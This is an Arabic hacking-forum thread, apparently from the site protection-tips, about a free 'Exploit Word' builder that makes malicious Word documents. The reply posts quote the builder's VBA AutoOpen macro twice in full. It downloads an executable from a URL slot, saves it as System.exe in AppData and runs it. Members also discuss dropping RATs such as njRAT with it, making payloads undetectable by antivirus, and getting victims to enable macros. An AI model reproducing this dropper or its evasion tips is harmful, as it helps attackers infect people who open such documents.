Exploit Word V1.0 by MR_AHMED for free

  • (واستعينوا بالصبر والصلاة وإنها لكبيرة إلا على الخاشعين)
    لاتضيع صلاتك .. تعتبر الصلاة الركن الثاني من أركان الاسلام، حيث لا يصحّ إسلام مسلمٍ إلا بها

  • (وماكان الله معذبهم وهم يستغفرون) ..الاستغفار هو السبيل الأقرب لنيل رضى الله عز وجل
    اللهم أنت ربي لا إله إلى أنت خلقتني وأنا عبدك، وأنا على عهدك ووعدك ما استطعت، أعوذ بك من شر ما صنعت، أبوء لك بنعمتك علي، وأبوء بذنبي فاغفر لي فإنّه لا يغفر الذنوب إلّا أنت

26 ديسمبر 2018
62
68
0
السلام عليكم ورحمة الله وبركاتة

طبعاً الموضوع من عنوانه .. :15:

سعر الاداة : 260 BTC

وانا هنا راح اطرحها بشكل مجااني
:150:

صورة للاداة




Screen Shot 2019-04-04 at 2.15.51 AM.png


التحميل



[ الرجاء عدم تحميل الملف الا بعد موافقة الادارة على الموضوع وان الملف سليم ]

 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,338
2,429
1
الله يعطيك العافية اخي الحبيب على المشاركة ..
البرنامج لايستحق اي ثمن .. لانه ببساطة بيقوم بانشاء ماكرو اوتوماتيكيا من خلال الاداة للملف المختار بدل من انشائه يدويا انت ..
هذا هو كل عمله حسب ماشفت لو فيه تصحيح من الشباب ياريت يخبروني
هنا اكواد الماكرو المستخدمه "داونلودر"
Bash:
Sub AutoOpen()
Application.ScreenUpdating = False
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "%%URL%%", False
xHttp.Send
Dim j As String
j = Environ("AppDATA")
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile j & "\System.exe", 2 '//overwrite
End With
Shell (j & "\System.exe")
Application.ScreenUpdating = True
End Sub
بيتم استبدال %%URL%% بالرابط المباشر اللي بالتكست بوكس

السورس بالمرفقات "سي شارب"
 

المرفقات

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
218
579
Kuwait
github.com
0
ماجربت الأداة ولكن تسويقياً هي موجهه إلى المستخدمين العاديين ومكتوب انها ثغرة وهذا يأكد كلامي.

أي شخص لديه خبرة برمجية بسيطة سوف يقوم بكتابة داونلودر للـ اوفيس مع بعض التمويهات.

شكراً على على المشاركة عزيزي
 
  • أعجبني
التفاعلات: ViRusRat و 3lioo-sy

0xm4n

.:: VIP ::.
2 يناير 2019
21
34
0
الله يعطيك العافية اخي الحبيب على المشاركة ..
البرنامج لايستحق اي ثمن .. لانه ببساطة بيقوم بانشاء مايكرو اوتوماتيكيا من خلال الاداة للملف المختار بدل من انشائه يدويا انت ..
هذا هو كل عمله حسب ماشفت لو فيه تصحيح من الشباب ياريت يخبروني
هنا اكواد المايكرو المستخدمه "داونلودر"
Bash:
Sub AutoOpen()
Application.ScreenUpdating = False
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "%%URL%%", False
xHttp.Send
Dim j As String
j = Environ("AppDATA")
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile j & "\System.exe", 2 '//overwrite
End With
Shell (j & "\System.exe")
Application.ScreenUpdating = True
End Sub
بيتم استبدال %%URL%% بالرابط المباشر اللي بالتكست بوكس

السورس بالمرفقات "سي شارب"
هل يمكن ربما أن الأكواد المستعملة هي الثغرة نفسها ? ليس لدي خبرة في الأمر و لكن أعتقد أن برنامج ك Word لن يسمح بتنفيذ أكواد كتلك
 
  • أعجبني
التفاعلات: BasharBachir و NYAN CAT

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
218
579
Kuwait
github.com
0
هل يمكن ربما أن الأكواد المستعملة هي الثغرة نفسها ? ليس لدي خبرة في الأمر و لكن أعتقد أن برنامج ك Word لن يسمح بتنفيذ أكواد كتلك
ليست ثغرة بل Macro , مجرد داونلودر يحمل ملفك (مثلا نجرات) ويحفظة في Temp وينفذة مباشرةً ,, يعني ملفك يجب أن يكون FUD لأنه لن يعمل في الذاكرة.

يمكنك انشاء ملف وورد بنفسك وعمل كوبي بيست للكود الذي طرحه حبيبنا بشار وترى النتيجة بنفسك. أيضاً اليوتيوب فيه طرح شرح لهذة الطريقة بتفصيل ممل.
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,338
2,429
1
هل يمكن ربما أن الأكواد المستعملة هي الثغرة نفسها ? ليس لدي خبرة في الأمر و لكن أعتقد أن برنامج ك Word لن يسمح بتنفيذ أكواد كتلك
اهلا اخي الحبيب عساك بخير ان شاء الله ..
مثل ماقال الاخ نيان ..هي ماكرو يعني لازم اصلا المستخدم يوافق على التنبيه اللي بيقول له اوعك توافق هه ..
لازم موافقة المستخدمة لتنفيذ الماكرو اخي الحبيب .الامر فقط هو انشاء الملف الناتج من خلال برنامج عوضا عن قيامك بهذا الامر يدويا "بيوفر عليك 20 ثانية تقريبا" هذه هي فائدة البرنامج الوحيدة
 
  • أعجبني
التفاعلات: 0xm4n و NYAN CAT

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
218
579
Kuwait
github.com
0
اهلا اخي الحبيب عساك بخير ان شاء الله ..
مثل ماقال الاخ نيان ..هي ماكرو يعني لازم اصلا المستخدم يوافق على التنبيه اللي بيقول له اوعك توافق هه ..
لازم موافقة المستخدمة لتنفيذ الماكرو اخي الحبيب .الامر فقط هو انشاء الملف الناتج من خلال برنامج عوضا عن قيامك بهذا الامر يدويا "بيوفر عليك 20 ثانية تقريبا" هذه هي فائدة البرنامج الوحيدة
في المنتديات الاجنبية مثل هذة البرنامج افضل ربحاً من الرات والكرابتر .. شيء غريب لوول. وفي حركة الـ popup مفيدة مع الماكرو
 
  • أعجبني
التفاعلات: BasharBachir و 0xm4n

0xm4n

.:: VIP ::.
2 يناير 2019
21
34
0
اهلا اخي الحبيب عساك بخير ان شاء الله ..
مثل ماقال الاخ نيان ..هي ماكرو يعني لازم اصلا المستخدم يوافق على التنبيه اللي بيقول له اوعك توافق هه ..
لازم موافقة المستخدمة لتنفيذ الماكرو اخي الحبيب .الامر فقط هو انشاء الملف الناتج من خلال برنامج عوضا عن قيامك بهذا الامر يدويا "بيوفر عليك 20 ثانية تقريبا" هذه هي فائدة البرنامج الوحيدة
نعم حركة التنبيه للموافقة على العملية هي ما أبحث عنه , شكرا على الشرح
 
  • أعجبني
التفاعلات: NYAN CAT و BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,338
2,429
1
في المنتديات الاجنبية مثل هذة البرنامج افضل ربحاً من الرات والكرابتر .. شيء غريب لوول. وفي حركة الـ popup مفيدة مع الماكرو
مااعرف حركة الpopup خخ اشرحها لنا لو شفت ذلك مناسب ..
الله يعطيك العافية اخي الحبيب
 
  • أعجبني
التفاعلات: NYAN CAT

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,338
2,429
1
نعم حركة التنبيه للموافقة على العملية هي ما أبحث عنه , شكرا على الشرح
الله يعافيك اخي الحبيب ..لاشكر على واجب انت تعرف هالشي واكثربكثير مني
 
  • أعجبني
التفاعلات: 0xm4n

๖ۣۜA M E E R

.:: DeveloPer ::.
طاقم الإدارة
4 نوفمبر 2018
10,207
525
العراق
0
شفت البرنامج سابقاً و ما حبيت ارد عليه لاني ما احب اضرب اعمال الناس .. الله يرزقنا و يرزق الجميع بالحلال ان شاء الله تعالى ..
لم اشغله لكن من خلال السورس البرنامج مجرد ينشئ ملف word و يضيف له vbscript تلقائياً . . اما الكود الـVb6 مثل ما قال بشار لا يوجد اضافة
مجرد داونلودر و shell للتشغيل .. يعني مجرد ما ينزل الملف على الهارد يتم امساكه من الحماية .. كنت افضل لو كان كود powershell
كنت احترمته اكثر ههه لان راح يكون فعال اكثر من نزول ملف مباشرة و تشغيله .. شي مثل التشفيرة السطحية ..
لا يوجد شيء مبهر ابداً لشخص يعرف الطريقة اليدوية لان اصلا يدوياً سهلة جداً ..
لكن كود الانشاء نفسه جيد و مفيد في برامج و افكار اخرى لذلك انصح بتنزيله و التعلم منه في هذه الجزئية الجميلة ...

بالتوفيق و اشكرك اخي على مشاركتنا البرنامج @[email protected]
 

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك